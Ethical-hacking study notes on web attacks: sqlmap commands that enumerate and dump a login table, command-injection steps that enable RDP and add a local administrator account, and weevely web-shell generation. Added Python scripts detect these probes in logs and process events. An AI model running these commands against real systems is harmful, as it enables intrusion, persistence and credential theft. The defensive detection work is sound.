02_web_attack
Goal: DB, Table, Column; the flag is hidden in the data
SQLi type
- inband: the injection point is also the output point
- blind: injection point, but no output
- oob (out-of-band):
  - mysql sends DNS
  - oracle sends HTTP
Detect
id=4-3
SQL Injection
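From the defender's side, the id=4-3 arithmetic probe listed under Detect and the sqlmap payloads leave traces in the web server access log. The script below is an added example, not part of the original notes or of sqlmap, that scans constructed Apache-style log lines for three indicators: a parameter whose value is an arithmetic expression instead of a plain integer, decoded values containing common SQL tokens, and sqlmap's default User-Agent string. The log lines, the `movie.php` target and the `scan_access_log` helper are constructed for illustration.

```python
"""Flag SQL-injection probes in web access logs (defender-side view).

Added example; the log lines below are constructed, not real traffic.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (Apache combined format).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /movie.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /movie.php?id=4-3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /movie.php?id=1%27%20AND%201%3D1--%20 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /movie.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=star+wars HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# The id=4-3 probe: an integer parameter that arrives as an arithmetic expression.
ARITH_RE = re.compile(r"^\d+\s*[-+*/]\s*\d+$")

# Tokens that rarely appear in legitimate parameter values (checked after decoding).
TOKEN_RE = re.compile(
    r"""('|"|--|#|/\*|;|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|\b(?:and|or)\b\s+\d+\s*=\s*\d+)""",
    re.I,
)


def classify_value(value):
    """Return the list of reasons a single decoded parameter value looks like a probe."""
    reasons = []
    if ARITH_RE.match(value):
        reasons.append("arithmetic-probe")
    if TOKEN_RE.search(value):
        reasons.append("sqli-token")
    return reasons


def scan_access_log(text):
    """Return (line_number, parameter, reason) tuples for every suspicious hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        if "sqlmap" in m.group("ua").lower():
            findings.append((lineno, "user-agent", "sqlmap-ua"))
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            # parse_qsl already decoded once; decode again so double-encoded
            # payloads (e.g. %2527) are still inspected in their final form.
            value = unquote_plus(raw)
            for reason in classify_value(value):
                findings.append((lineno, name, reason))
    return findings


if __name__ == "__main__":
    for lineno, param, reason in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {param}: {reason}")
```

The arithmetic check is the one worth keeping even if the token list is tuned away: a value like `4-3` for an integer id is almost never produced by a browser, and it is the first thing a tester sends.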
sqlmap -u <url> --cookie="user=12343"
sqlmap -r r.txt
sqlmap -r r.txt --dbs
sqlmap -r r.txt -D moveiscope --tables
sqlmap -r r.txt -D moveiscope -T User_Login --columns
sqlmap -r r.txt -D moveiscope -T User_Login --columns --technique=B
sqlmap -r r.txt -D moveiscope -T User_Login --dump --technique=B
The list of techniques and their letters is as follows:
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries
Command Injection
- check rdp
netstat -an | findstr :3389
- open 3389
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- add cehp user
net user cehp /add
- view users
net users
- add into admin group
net localgroup Administrators cehp /add
- view group
net localgroup Administrators
Upload File
weevely generate cehp backdoor.php
weevely <url> cehp
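The command-injection steps above (enable RDP through the registry, create a local user, add it to Administrators) are exactly the actions a defender should alert on when they are spawned by a web server process. The script below is an added example, not part of the original notes, that runs three rules over constructed process-creation events (Sysmon Event ID 1 style fields: timestamp, parent image, command line), raises the severity when the parent is a web server, and correlates a freshly created user being added to the local admin group. The events, the `httpd.exe` path and the `detect` helper are constructed for illustration; in real telemetry the direct parent is usually `cmd.exe`, so the ancestry has to be walked one step further.

```python
"""Flag RDP enablement, local user creation and admin-group changes in
process-creation logs, and correlate them into one chain.

Added example; the events below are constructed, not real telemetry.
"""
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    {"ts": "10:01:00", "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "netstat -an"},
    {"ts": "10:02:00", "parent": r"C:\xampp\apache\bin\httpd.exe",
     "cmdline": r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"ts": "10:02:05", "parent": r"C:\xampp\apache\bin\httpd.exe", "cmdline": "net user cehp /add"},
    {"ts": "10:02:10", "parent": r"C:\xampp\apache\bin\httpd.exe", "cmdline": "net localgroup Administrators cehp /add"},
    {"ts": "10:05:00", "parent": r"C:\Windows\explorer.exe", "cmdline": "net user"},
]

# Parent images that should never be spawning account or registry changes.
WEB_SERVER_IMAGES = {"httpd.exe", "w3wp.exe", "nginx.exe", "php-cgi.exe", "php.exe"}

# (rule name, pattern); the named group "user" is captured where the command names one.
RULES = [
    ("rdp-enabled-via-registry",
     re.compile(r"\breg(?:\.exe)?\s+add\s+.*terminal server.*fDenyTSConnections.*/d\s+0\b", re.I)),
    ("local-user-created",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(?P<user>\S+)\s+.*?/add\b", re.I)),
    ("added-to-local-admins",
     re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(?P<user>\S+)\s+/add\b", re.I)),
]


def image_name(path):
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return alert dicts in event order; a correlated alert follows the event that completes the chain."""
    alerts = []
    created = set()  # users created earlier in this batch
    for ev in events:
        from_web = image_name(ev["parent"]) in WEB_SERVER_IMAGES
        for rule, pattern in RULES:
            m = pattern.search(ev["cmdline"])
            if not m:
                continue
            user = m.groupdict().get("user")
            alerts.append({"ts": ev["ts"], "rule": rule,
                           "severity": "high" if from_web else "medium", "user": user})
            if rule == "local-user-created":
                created.add(user.lower())
            elif rule == "added-to-local-admins" and user.lower() in created:
                # Same user created and promoted in one batch: the full chain from the notes.
                alerts.append({"ts": ev["ts"], "rule": "new-user-added-to-admins",
                               "severity": "high", "user": user})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["ts"]} [{a["severity"]}] {a["rule"]} user={a["user"]}')
```

Plain `net user` and `netstat` (the enumeration steps) are deliberately not matched: they are common in normal administration, and alerting on them mainly adds noise. The parent-image check is what separates an administrator doing this at a console from a web application doing it.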